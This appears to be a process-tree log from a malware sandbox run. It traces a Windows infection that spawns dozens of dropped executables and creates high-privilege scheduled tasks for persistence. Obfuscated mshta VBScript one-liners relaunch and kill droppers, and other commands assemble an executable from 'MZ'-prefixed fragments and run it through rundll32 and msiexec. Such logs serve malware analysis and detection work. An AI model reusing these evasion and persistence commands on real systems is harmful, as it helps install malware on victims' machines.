C:\Users\Admin\AppData\Local\Temp\is-9GMBL.tmp\1tIAqp6kGrnP6WyxC1y0hMdy.tmp"C:\Users\Admin\AppData\Local\Temp\is-9GMBL.tmp\1tIAqp6kGrnP6WyxC1y0hMdy.tmp" /SL5="$3025E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\1tIAqp6kGrnP6WyxC1y0hMdy.exe"8⤵PID:4280
-
-
-
C:\Users\Admin\Pictures\Adobe Films\su7mZpo0eTZCdgFR5a_f4GUQ.exe"C:\Users\Admin\Pictures\Adobe Films\su7mZpo0eTZCdgFR5a_f4GUQ.exe"7⤵PID:7716
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:6840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:2860
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Lz_GN1YsrkL1bNTIgS5UzsdW.exe"C:\Users\Admin\Pictures\Adobe Films\Lz_GN1YsrkL1bNTIgS5UzsdW.exe"5⤵PID:5980
-
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"6⤵PID:5228
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"6⤵PID:4160
-
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"6⤵PID:5344
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2JU5nCcd4fTtlgONr5akugHK.exe"C:\Users\Admin\Pictures\Adobe Films\2JU5nCcd4fTtlgONr5akugHK.exe"5⤵PID:5972
-
-
C:\Users\Admin\Pictures\Adobe Films\m0c0czkVzDDheYw8i5Nahfmc.exe"C:\Users\Admin\Pictures\Adobe Films\m0c0czkVzDDheYw8i5Nahfmc.exe"5⤵PID:5952
-
-
C:\Users\Admin\Pictures\Adobe Films\rAEi1Qx8z9lmL00ujOqXooXO.exe"C:\Users\Admin\Pictures\Adobe Films\rAEi1Qx8z9lmL00ujOqXooXO.exe"5⤵PID:4924
-
-
C:\Users\Admin\Pictures\Adobe Films\TAvMJ51gJqZFz2NdbjysmNcy.exe"C:\Users\Admin\Pictures\Adobe Films\TAvMJ51gJqZFz2NdbjysmNcy.exe"5⤵PID:5272
-
-
C:\Users\Admin\Pictures\Adobe Films\4srw3GxZPGdctZpuJvT37GtW.exe"C:\Users\Admin\Pictures\Adobe Films\4srw3GxZPGdctZpuJvT37GtW.exe"5⤵PID:2944
-
-
C:\Users\Admin\Pictures\Adobe Films\9g2O2tOmWnk_3OwjkPJbvnLD.exe"C:\Users\Admin\Pictures\Adobe Films\9g2O2tOmWnk_3OwjkPJbvnLD.exe"5⤵PID:444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 4006⤵
- Program crash
PID:5936
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yrjrKfuTrqIlKQTJBHxKREg0.exe"C:\Users\Admin\Pictures\Adobe Films\yrjrKfuTrqIlKQTJBHxKREg0.exe"5⤵PID:5572
-
-
C:\Users\Admin\Pictures\Adobe Films\mtTvtQQOR97SnUABTfmRZBGQ.exe"C:\Users\Admin\Pictures\Adobe Films\mtTvtQQOR97SnUABTfmRZBGQ.exe"5⤵PID:5668
-
-
C:\Users\Admin\Pictures\Adobe Films\op1whHKmaIK6kyN3LrS3n1fv.exe"C:\Users\Admin\Pictures\Adobe Films\op1whHKmaIK6kyN3LrS3n1fv.exe"5⤵PID:5580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 4046⤵
- Program crash
PID:2884
-
-
-
C:\Users\Admin\Pictures\Adobe Films\u4TnIF9rytPw4iKg7oyXFLWM.exe"C:\Users\Admin\Pictures\Adobe Films\u4TnIF9rytPw4iKg7oyXFLWM.exe"5⤵PID:6096
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd6⤵PID:6964
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Kgq0GyFAiddduKUqEFKM9w4e.exe"C:\Users\Admin\Pictures\Adobe Films\Kgq0GyFAiddduKUqEFKM9w4e.exe"5⤵PID:5404
-
-
C:\Users\Admin\Pictures\Adobe Films\iHEFhtagofzmGlUpHbr5GPQ7.exe"C:\Users\Admin\Pictures\Adobe Films\iHEFhtagofzmGlUpHbr5GPQ7.exe"5⤵PID:4412
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping youtube.com6⤵PID:6932
-
C:\Windows\system32\PING.EXEping youtube.com7⤵
- Runs ping.exe
PID:6784
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\HUU3VcWoPH70bwEQ83qdvXXW.exe"C:\Users\Admin\Pictures\Adobe Films\HUU3VcWoPH70bwEQ83qdvXXW.exe"5⤵PID:5828
-
-
C:\Users\Admin\Pictures\Adobe Films\W7uzkbtM3RWN9zPnBjG20YBO.exe"C:\Users\Admin\Pictures\Adobe Films\W7uzkbtM3RWN9zPnBjG20YBO.exe"5⤵PID:6140
-
-
C:\Users\Admin\Pictures\Adobe Films\3zm_ZwEjLfQgsPfQDnzcXjEx.exe"C:\Users\Admin\Pictures\Adobe Films\3zm_ZwEjLfQgsPfQDnzcXjEx.exe"5⤵PID:5036
-
C:\Users\Admin\Pictures\Adobe Films\3zm_ZwEjLfQgsPfQDnzcXjEx.exe"C:\Users\Admin\Pictures\Adobe Films\3zm_ZwEjLfQgsPfQDnzcXjEx.exe"6⤵PID:6720
-
-
-
C:\Users\Admin\Pictures\Adobe Films\57ChXLtUUcEtd1QC_wBHHJNC.exe"C:\Users\Admin\Pictures\Adobe Films\57ChXLtUUcEtd1QC_wBHHJNC.exe"5⤵PID:4300
-
-
C:\Users\Admin\Pictures\Adobe Films\kiWoBwmJGG7LLDJp1o8tEumn.exe"C:\Users\Admin\Pictures\Adobe Films\kiWoBwmJGG7LLDJp1o8tEumn.exe"5⤵PID:5364
-
-
C:\Users\Admin\Pictures\Adobe Films\Z07Qs_8dukoouzEqx_62jsh5.exe"C:\Users\Admin\Pictures\Adobe Films\Z07Qs_8dukoouzEqx_62jsh5.exe"5⤵PID:5280
-
-
C:\Users\Admin\Pictures\Adobe Films\7A1LyyCX6M5DOQ8NsjN7Isg2.exe"C:\Users\Admin\Pictures\Adobe Films\7A1LyyCX6M5DOQ8NsjN7Isg2.exe"5⤵PID:3652
-
-
C:\Users\Admin\Pictures\Adobe Films\h_IhvbniuMIgg0yCSzbRB0zf.exe"C:\Users\Admin\Pictures\Adobe Films\h_IhvbniuMIgg0yCSzbRB0zf.exe"5⤵PID:3012
-
C:\Users\Admin\AppData\Roaming\7544316.exe"C:\Users\Admin\AppData\Roaming\7544316.exe"6⤵PID:5128
-
-
C:\Users\Admin\AppData\Roaming\2907082.exe"C:\Users\Admin\AppData\Roaming\2907082.exe"6⤵PID:1328
-
-
C:\Users\Admin\AppData\Roaming\3505703.exe"C:\Users\Admin\AppData\Roaming\3505703.exe"6⤵PID:1324
-
-
C:\Users\Admin\AppData\Roaming\564514.exe"C:\Users\Admin\AppData\Roaming\564514.exe"6⤵PID:3756
-
-
C:\Users\Admin\AppData\Roaming\251065.exe"C:\Users\Admin\AppData\Roaming\251065.exe"6⤵PID:4988
-
C:\Users\Admin\AppData\Roaming\4958929.exe"C:\Users\Admin\AppData\Roaming\4958929.exe"7⤵PID:2904
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt:clOSE (cReAteobject ("WScripT.shEll" ). rUN( "C:\Windows\system32\cmd.exe /q /c cOpY /y ""C:\Users\Admin\AppData\Roaming\4958929.exe"" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF """" == """" for %T iN ( ""C:\Users\Admin\AppData\Roaming\4958929.exe"" ) do taskkill /im ""%~nXT"" -F ", 0 , tRuE) )8⤵PID:3052
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c cOpY /y "C:\Users\Admin\AppData\Roaming\4958929.exe" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF "" == "" for %T iN ( "C:\Users\Admin\AppData\Roaming\4958929.exe") do taskkill /im "%~nXT" -F9⤵PID:6912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:2240
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4958929.exe" -F10⤵
- Kills process with taskkill
PID:7628
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\106656.exe"C:\Users\Admin\AppData\Roaming\106656.exe"7⤵PID:5016
-
-
-
C:\Users\Admin\AppData\Roaming\6485933.exe"C:\Users\Admin\AppData\Roaming\6485933.exe"6⤵PID:5812
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AwTxlmCABrJz7EAdimlbFcu2.exe"C:\Users\Admin\Pictures\Adobe Films\AwTxlmCABrJz7EAdimlbFcu2.exe"5⤵
- Executes dropped EXE
PID:520
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12bf97133ddde4842.exe3⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12bf97133ddde4842.exeWed12bf97133ddde4842.exe4⤵PID:2240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12e5a6a551c39b62a.exe3⤵PID:348
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12e5a6a551c39b62a.exeWed12e5a6a551c39b62a.exe4⤵
- Executes dropped EXE
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12e5a6a551c39b62a.exeC:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12e5a6a551c39b62a.exe5⤵PID:592
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12581881318b9e75.exe3⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12581881318b9e75.exeWed12581881318b9e75.exe4⤵
- Executes dropped EXE
PID:3492 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPt: cLoSE(CreAteOBJEcT( "WScRIpt.SHelL" ).rUN ("C:\Windows\system32\cmd.exe /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12581881318b9e75.exe"" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF """" == """" for %C IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12581881318b9e75.exe"" ) do taskkill -iM ""%~NxC"" /F" ,0 , tRue ) )5⤵PID:5080
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-G17RA.tmp\Wed124bd92a370.tmp"C:\Users\Admin\AppData\Local\Temp\is-G17RA.tmp\Wed124bd92a370.tmp" /SL5="$60048,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed124bd92a370.exe"1⤵PID:4616
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C tYpE "C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12581881318b9e75.exe" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF "" =="" for %C IN ( "C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12581881318b9e75.exe" ) do taskkill -iM "%~NxC" /F1⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS2⤵PID:3136
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPt: cLoSE(CreAteOBJEcT( "WScRIpt.SHelL" ).rUN ("C:\Windows\system32\cmd.exe /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE"" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF ""/pAA1Exp5mOw9JMS "" == """" for %C IN ( ""C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE"" ) do taskkill -iM ""%~NxC"" /F" ,0 , tRue ) )3⤵PID:5020
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C tYpE "C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF "/pAA1Exp5mOw9JMS " =="" for %C IN ( "C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE" ) do taskkill -iM "%~NxC" /F4⤵PID:444
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRipT: ClOSE ( creAteOBJeCT ( "WSCRiPT.ShEll" ).RuN ( "C:\Windows\system32\cmd.exe /Q /R EcHo | SEt /p = ""MZ"" > 88RS.Le2& copy /y /b 88RS.Le2 + 5X8zA.G26 +~uK~V0.Rcv + FXLXz.ZXS + hrO~~rUD.m + A1T1O.TS + EQnYZisO.LU NBOX.D&sTARt control.exe .\NBOX.D " , 0, tRue) )3⤵PID:1440
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Wed12581881318b9e75.exe" /F2⤵
- Kills process with taskkill
PID:1200
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3168 -s 14881⤵
- Program crash
PID:4572
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"1⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi2⤵PID:4904
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )3⤵PID:5832
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"4⤵PID:6204
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )3⤵PID:4260
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC4⤵PID:2956
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "5⤵PID:6024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"5⤵PID:5536
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC5⤵PID:7516
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"2⤵
- Kills process with taskkill
PID:6680
-
-
C:\Users\Admin\AppData\Roaming\6333206.exe"C:\Users\Admin\AppData\Roaming\6333206.exe"1⤵PID:5204
-
C:\Users\Admin\AppData\Roaming\138082.exe"C:\Users\Admin\AppData\Roaming\138082.exe"1⤵PID:2876
-
C:\Users\Admin\AppData\Roaming\2256751.exe"C:\Users\Admin\AppData\Roaming\2256751.exe"1⤵PID:3704
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /R EcHo | SEt /p = "MZ" >88RS.Le2& copy /y /b 88RS.Le2+ 5X8zA.G26+~uK~V0.Rcv+ FXLXz.ZXS + hrO~~rUD.m + A1T1O.TS+ EQnYZisO.LU NBOX.D&sTARt control.exe .\NBOX.D1⤵PID:5556
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "2⤵PID:7148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>88RS.Le2"2⤵PID:6256
-
-
C:\Windows\SysWOW64\control.execontrol.exe .\NBOX.D2⤵PID:7004
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\NBOX.D3⤵PID:7148
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\NBOX.D4⤵PID:4208
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\NBOX.D5⤵PID:6588
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\4266949.exe"C:\Users\Admin\AppData\Roaming\4266949.exe"1⤵PID:6344
-
C:\Users\Admin\AppData\Roaming\8809580.exe"C:\Users\Admin\AppData\Roaming\8809580.exe"2⤵PID:3628
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt:clOSE (cReAteobject ("WScripT.shEll" ). rUN( "C:\Windows\system32\cmd.exe /q /c cOpY /y ""C:\Users\Admin\AppData\Roaming\8809580.exe"" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF """" == """" for %T iN ( ""C:\Users\Admin\AppData\Roaming\8809580.exe"" ) do taskkill /im ""%~nXT"" -F ", 0 , tRuE) )3⤵PID:6644
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c cOpY /y "C:\Users\Admin\AppData\Roaming\8809580.exe" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF "" == "" for %T iN ( "C:\Users\Admin\AppData\Roaming\8809580.exe") do taskkill /im "%~nXT" -F4⤵PID:5160
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "8809580.exe" -F5⤵
- Kills process with taskkill
PID:5820
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\5996487.exe"C:\Users\Admin\AppData\Roaming\5996487.exe"2⤵PID:5996
-
-
C:\Users\Admin\AppData\Roaming\6492186.exe"C:\Users\Admin\AppData\Roaming\6492186.exe"1⤵PID:6368
-
C:\Users\Admin\AppData\Roaming\2325477.exe"C:\Users\Admin\AppData\Roaming\2325477.exe"1⤵PID:6324
-
C:\Users\Admin\AppData\Roaming\1882029.exe"C:\Users\Admin\AppData\Roaming\1882029.exe"1⤵PID:2300
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1688 -
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Process spawned unexpected child process
PID:6448 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global3⤵PID:6528
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:6724